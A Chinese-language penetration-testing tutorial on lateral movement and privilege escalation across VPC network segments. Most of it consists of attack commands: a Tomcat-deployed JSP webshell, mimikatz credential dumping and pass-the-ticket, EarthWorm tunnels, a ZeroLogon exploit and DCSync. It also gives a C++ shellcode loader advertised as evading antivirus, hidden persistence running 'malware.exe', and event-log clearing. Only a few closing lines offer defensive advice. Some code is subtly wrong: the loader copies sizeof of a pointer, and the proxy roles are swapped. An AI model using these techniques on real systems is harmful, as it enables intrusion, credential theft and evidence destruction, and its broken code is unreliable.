内网渗透实战：VPC环境下的多网段横向移动与权限提升

1. VPC环境下的内网渗透基础

在开始实战之前，我们需要先搞清楚几个关键概念。VPC（Virtual Private Cloud）就像是一个企业内部的专属网络空间，不同部门可能被划分到不同的网段中，彼此之间通过防火墙和路由规则进行隔离。这种架构在提升安全性的同时，也给渗透测试带来了独特挑战。

我遇到过不少企业网络，表面上看起来固若金汤，实际上内部网段间的防护往往存在薄弱环节。就拿去年的一次实战来说，从一台边缘Web服务器入手，最终拿下了整个域控，靠的就是对多网段环境的深入理解。下面这些基础知识你需要牢牢掌握：

• 网络拓扑识别：使用arp-scan -l或nmap -sn快速扫描当前网段存活主机
• 路由信息收集：Windows下用route print，Linux下用ip route show
• 代理搭建技巧：常用reGeorg、EarthWorm等工具建立隧道
• 防火墙策略探测：通过netsh advfirewall show currentprofile查看策略

2. 初始突破与立足点建立

实战中，Web应用往往是最容易突破的入口。记得有次遇到一个Tomcat后台，用默认凭证tomcat/tomcat就直接进去了，这种低级错误在真实环境里居然屡见不鲜。

典型攻击流程：

1. 使用哥斯拉生成jsp马：

java -jar Godzilla.jar --gui

2. 打包为WAR文件：

zip -r shell.war shell.jsp

3. 通过Tomcat管理页面上传后，访问http://target:8080/shell/shell.jsp

上线CS后别急着横向移动，先做好这几件事：

• 抓取密码哈希：mimikatz "sekurlsa::logonpasswords"
• 查看网络配置：ipconfig /all
• 检查域信息：net config workstation
• 收集凭证文件：搜索桌面、文档中的config、password等关键词

3. 多网段横向渗透实战

当发现当前网段存在多个子网时，我通常会按照这个步骤推进：

3.1 代理隧道搭建

推荐使用EarthWorm进行多级代理：

# 目标机器执行（正向代理） ew -s rcsocks -l 1080 -e 1024 # 攻击机执行（连接代理） ew -s rssocks -d target_ip -e 1024

3.2 跨网段扫描技巧

通过代理后，建议使用这些方法扫描：

• Nmap绕过防火墙：

nmap -sS -Pn -n --script=smb-os-discovery --proxy socks4://127.0.0.1:1080 192.168.3.0/24

• Fscan高效扫描：

fscan -h 192.168.3.0/24 -p 21,22,80,445,3389 -o result.txt

3.3 票据传递攻击实战

当获取到域用户凭证后，票据传递是最有效的横向移动手段：

# 获取Kerberos票据 mimikatz "kerberos::ask /target:DC.domain.com" # 导出票据 mimikatz "kerberos::list /export" # 注入票据 mimikatz "kerberos::ptt ticket.kirbi"

4. 权限提升与域控突破

4.1 本地提权常用手法

遇到Windows服务器时，这些方法成功率较高：

• 服务路径劫持：检查可写服务路径

wmic service get name,displayname,pathname,startmode | findstr /i "auto"

• AlwaysInstallElevated：检查注册表项

HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

4.2 域控攻击实战

针对域控的几种致命攻击方式：

1. ZeroLogon漏洞利用：

python cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP

2. DCSync攻击：

mimikatz "lsadump::dcsync /domain:domain.com /user:administrator"

3. 委派攻击：

Get-NetComputer -TrustedToAuth | Select-Object name,msds-allowedtodelegateto

5. 免杀与持久化技巧

企业环境通常部署了杀毒软件，需要特别处理：

5.1 加载器免杀方案

这个C++加载器我用了很久都没被查杀：

#include <Windows.h> #include <fstream> void ExecuteShellcode(char* buf) { void* exec = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, buf, sizeof(buf)); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0); } int main() { std::ifstream file("shell.bin", std::ios::binary); file.seekg(0, std::ios::end); size_t size = file.tellg(); char* shellcode = new char[size]; file.seekg(0, std::ios::beg); file.read(shellcode, size); ExecuteShellcode(shellcode); return 0; }

5.2 隐蔽持久化方法

比起常规的启动项，这些方式更隐蔽：

• 计划任务：

schtasks /create /tn "UpdateService" /tr "C:\malware.exe" /sc hourly /mo 1

• WMI事件订阅：

$filterArgs = @{Name="UpdateFilter"; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"} $consumerArgs = @{Name="UpdateConsumer"; CommandLineTemplate="C:\Windows\System32\malware.exe"}

6. 痕迹清理与防御建议

完成渗透后，记得清理这些痕迹：

• 日志清除：

Clear-EventLog -LogName Security

• 文件时间戳修改：

copy /b malware.exe +,,

给防御方的建议：

• 启用LSA保护
• 限制NTLM使用
• 监控异常票据请求
• 定期检查域控异常日志

在实际渗透中，最大的挑战往往不是技术本身，而是保持足够的耐心。有次为了突破一个金融企业的防御，我花了三周时间慢慢摸清他们的网络架构，最终从一个被遗忘的测试服务器找到了突破口。记住，内网渗透是场持久战，急不得。